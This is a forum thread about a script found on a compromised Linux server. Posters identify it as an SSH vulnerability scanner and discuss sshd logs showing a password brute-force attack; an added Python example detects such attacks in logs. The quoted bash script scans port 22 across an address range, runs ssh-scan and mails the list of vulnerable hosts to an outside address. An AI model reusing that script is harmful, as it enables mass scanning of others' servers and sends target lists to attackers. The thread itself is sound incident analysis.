  1. #1
    Join Date: Apr 2004 | Location: India | Posts: 292

    What does this rootkit do?

    Hi Guys,
    I found a rootkit named "psybnc" along with the ssh folder, which has lots of scripts inside ...
    I opened some scripts ... they have IPs in my subnet.....
    For example, a script inside has the following code...
    -------------------------------------------------------------
    #!/bin/bash
    if [ $# != 1 ]; then
    echo " usage: $0 <b class>"
    exit;
    fi



    echo " Versiune de scaner privata!"
    echo "----------------------------------------------------"
    echo " All my love for PIZDE "
    echo "----------------------------------------------------"
    echo "# incep scanarea Morpheuse..."
    ./pscan2 $1 22

    sleep 10
    cat $1.pscan.22 |sort |uniq > mfu.txt
    oopsnr2=`grep -c . mfu.txt`
    echo "# Am gasit $oopsnr2 de servere"
    echo "----------------------------------------"
    echo "# Incepem Sa Terminam ..."
    ./ssh-scan 50
    cat vuln.txt | mail -s "Dosare root" [email protected]
    rm -rf $1.pscan.22 mfu.txt
    echo "Asta a fost tot"
    --------------------------------------------------------------------------

    I need to know whether it is something like an SSH rootkit ... or something else...

    Thanks in advance...
    Last edited by atul; 05-24-2005 at 07:19 AM.
    thelinophile
    Thinking Different !!

  2. #2
    Join Date: Oct 2004 | Location: India | Posts: 80
    Though psybnc is an IRC bouncer, the code that you pasted is an old SSH vulnerability scanner. It will scan the subnet for vulnerable hosts and will mail them to the mail ID that is in the code.
    AssuredHost.Com
    Secured Shared and Reseller Web hosting Solutions
    We Host Your Trust

  3. #3
    I had this bookmarked; it's a little old but gives you a start.

    http://www.jestrix.net/tuts/psy.html

  4. #4
    Join Date: Apr 2004 | Location: India | Posts: 292
    Hi guys,
    Thanks for the info.....
    Actually, I am attaching the whole rootkit material as well as the related material I could find....
    Is there any way to find out more about things ... like the entry point? I guess he might have used wget ... ? Or a mail ...?
    I am not sure....
    But please go through the attached material for your further info...
    Thanks..
    thelinophile
    Thinking Different !!

  5. #5
    Join Date: Apr 2004 | Location: India | Posts: 292
    Hi
    I found more to it...
    There is a file inside that material which has this ...
    -----------------------------------------------------------------------------------
    May 22 09:45:55 brlinux sshd[24183]: Did not receive identification string from ::ffff:219.237.243.240
    May 22 09:58:21 brlinux sshd[26717]: Failed password for nobody from ::ffff:219.237.243.240 port 60263 ssh2
    May 22 09:58:24 brlinux sshd[26719]: Invalid user patrick from ::ffff:219.237.243.240
    May 22 09:58:26 brlinux sshd[26719]: Failed password for invalid user patrick from ::ffff:219.237.243.240 port 60330 ssh2
    May 22 09:58:29 brlinux sshd[26721]: Invalid user patrick from ::ffff:219.237.243.240
    May 22 09:58:31 brlinux sshd[26721]: Failed password for invalid user patrick from ::ffff:219.237.243.240 port 60391 ssh2
    May 22 09:58:36 brlinux sshd[26723]: Failed password for root from ::ffff:219.237.243.240 port 60452 ssh2
    May 22 09:58:42 brlinux sshd[26725]: Failed password for root from ::ffff:219.237.243.240 port 60516 ssh2
    May 22 09:58:47 brlinux sshd[26727]: Failed password for root from ::ffff:219.237.243.240 port 60574 ssh2
    May 22 09:58:52 brlinux sshd[26729]: Failed password for root from ::ffff:219.237.243.240 port 60642 ssh2
    May 22 09:58:57 brlinux sshd[26731]: Failed password for root from ::ffff:219.237.243.240 port 60709 ssh2
    May 22 09:59:00 brlinux sshd[26733]: Invalid user rolo from ::ffff:219.237.243.240
    May 22 09:59:02 brlinux sshd[26733]: Failed password for invalid user rolo from ::ffff:219.237.243.240 port 60764 ssh2
    May 22 09:59:05 brlinux sshd[26735]: Invalid user iceuser from ::ffff:219.237.243.240
    May 22 09:59:07 brlinux sshd[26735]: Failed password for invalid user iceuser from ::ffff:219.237.243.240 port 60823 ssh2
    May 22 09:59:10 brlinux sshd[26737]: Invalid user horde from ::ffff:219.237.243.240
    May 22 09:59:13 brlinux sshd[26737]: Failed password for invalid user horde from ::ffff:219.237.243.240 port 60876 ssh2
    May 22 09:59:15 brlinux sshd[26740]: Invalid user cyrus from ::ffff:219.237.243.240
    May 22 09:59:18 brlinux sshd[26740]: Failed password for invalid user cyrus from ::ffff:219.237.243.240 port 60935 ssh2
    May 22 09:59:21 brlinux sshd[26742]: Invalid user www from ::ffff:219.237.243.240
    May 22 09:59:23 brlinux sshd[26742]: Failed password for invalid user www from ::ffff:219.237.243.240 port 60999 ssh2
    May 22 09:59:26 brlinux sshd[26744]: Invalid user wwwrun from ::ffff:219.237.243.240
    May 22 09:59:28 brlinux sshd[26744]: Failed password for invalid user wwwrun from ::ffff:219.237.243.240 port 32838 ssh2
    May 22 09:59:31 brlinux sshd[26746]: Invalid user matt from ::ffff:219.237.243.240
    May 22 09:59:33 brlinux sshd[26746]: Failed password for invalid user matt from ::ffff:219.237.243.240 port 32900 ssh2
    May 22 09:59:36 brlinux sshd[26758]: Invalid user test from ::ffff:219.237.243.240
    May 22 09:59:39 brlinux sshd[26758]: Failed password for invalid user test from ::ffff:219.237.243.240 port 32961 ssh2
    May 22 09:59:41 brlinux sshd[26760]: Invalid user test from ::ffff:219.237.243.240

    -----------------------------------------------------------------------------------
    Now it seems that the hacker tried to brute force with user IDs and passwords ...
    He has a good precompiled list of user IDs and passwords ....
    and he tried that...

    So it is ... a combination of ... an IRC bouncer ... an old SSH vuln scanner ... and a BFD...
    Clever...
    thelinophile
    Thinking Different !!
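    The log excerpt above shows the pattern a defender wants to catch automatically: a run of "Failed password" and "Invalid user" lines from one source address within a short time. The Python script below is an added example, not code from the thread or from the rootkit material; it parses sshd log lines of the shape shown above, groups failures by source IP and flags any source whose failures within a sliding window reach a threshold. The sample lines, the 10.0.0.5 address and the threshold/window values are constructed for the example (the attacker address is the one from the excerpt).

```python
import re
from collections import defaultdict
from datetime import datetime

# Patterns for the two sshd message shapes seen in the excerpt
# (IPv4-mapped "::ffff:" prefix is optional).
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from "
    r"(?:::ffff:)?(?P<ip>[\d.]+) port \d+ ssh2$"
)
INVALID_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Invalid user (?P<user>\S+) from (?:::ffff:)?(?P<ip>[\d.]+)$"
)


def parse_ts(ts, year=2005):
    """Syslog timestamps carry no year; assume one (2005 here, as in the thread)."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def parse_line(line):
    """Return (timestamp, ip, user, kind) for a relevant sshd line, else None."""
    for kind, rx in (("failed", FAILED_RE), ("invalid", INVALID_RE)):
        m = rx.match(line.strip())
        if m:
            return parse_ts(m.group("ts")), m.group("ip"), m.group("user"), kind
    return None


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Group password failures by source IP and flag sources whose failures
    inside any window_seconds span reach threshold. Returns {ip: summary}."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, ip, user, kind = parsed
        # "Invalid user" is always followed by a "Failed password" line for the
        # same attempt, so count only the latter to avoid double counting.
        if kind == "failed":
            events[ip].append((ts, user))

    report = {}
    for ip, evs in events.items():
        evs.sort()
        times = [t for t, _ in evs]
        peak, start = 0, 0
        for end in range(len(times)):            # sliding window over sorted times
            while (times[end] - times[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        report[ip] = {
            "failures": len(evs),
            "distinct_users": sorted({u for _, u in evs}),
            "peak_in_window": peak,
            "flagged": peak >= threshold,
        }
    return report


# Constructed sample, modelled on the excerpt: a dictionary attack from one
# address, plus a legitimate user who mistypes once and then logs in.
SAMPLE_LOG = """\
May 22 09:58:21 brlinux sshd[26717]: Failed password for nobody from ::ffff:219.237.243.240 port 60263 ssh2
May 22 09:58:24 brlinux sshd[26719]: Invalid user patrick from ::ffff:219.237.243.240
May 22 09:58:26 brlinux sshd[26719]: Failed password for invalid user patrick from ::ffff:219.237.243.240 port 60330 ssh2
May 22 09:58:36 brlinux sshd[26723]: Failed password for root from ::ffff:219.237.243.240 port 60452 ssh2
May 22 09:58:42 brlinux sshd[26725]: Failed password for root from ::ffff:219.237.243.240 port 60516 ssh2
May 22 09:58:47 brlinux sshd[26727]: Failed password for root from ::ffff:219.237.243.240 port 60574 ssh2
May 22 09:58:52 brlinux sshd[26729]: Failed password for root from ::ffff:219.237.243.240 port 60642 ssh2
May 22 10:15:03 brlinux sshd[27001]: Failed password for alice from 10.0.0.5 port 40001 ssh2
May 22 10:15:09 brlinux sshd[27001]: Accepted password for alice from 10.0.0.5 port 40001 ssh2
"""

if __name__ == "__main__":
    for ip, summary in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        status = "BRUTE FORCE" if summary["flagged"] else "ok"
        print(f"{ip:16} {status:12} failures={summary['failures']} "
              f"peak/60s={summary['peak_in_window']} users={summary['distinct_users']}")
```

    The threshold and window are deliberately conservative; the point is that the scanner's tempo (several attempts per minute, cycling through root and a fixed list of usernames) is what separates it from a user who mistypes once, and that the "Accepted password" line for a source that was flagged moments earlier is the event worth alerting on.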

  6. #6
    Join Date: Jun 2003 | Posts: 961
    Originally posted by atul

    <snip>
    echo "# incep scanarea Morpheuse..."
    ./pscan2 $1 22

    sleep 10
    cat $1.pscan.22 |sort |uniq > mfu.txt
    oopsnr2=`grep -c . mfu.txt`
    echo "# Am gasit $oopsnr2 de servere"
    echo "----------------------------------------"
    echo "# Incepem Sa Terminam ..."
    ./ssh-scan 50
    cat vuln.txt | mail -s "Dosare root" [email protected]
    rm -rf $1.pscan.22 mfu.txt
    echo "Asta a fost tot"
    <snip>
    So it is ... a combination of ... an IRC bouncer ... an old SSH vuln scanner ... and a BFD...
    Clever...
    Actually, no.
    The script is just named "psybnc"; it does not have anything in common with the IRC bouncer. It is only an SSH vuln scanner:
    it scans for IPs and runs ssh-scan on them, then emails the results to the email address.
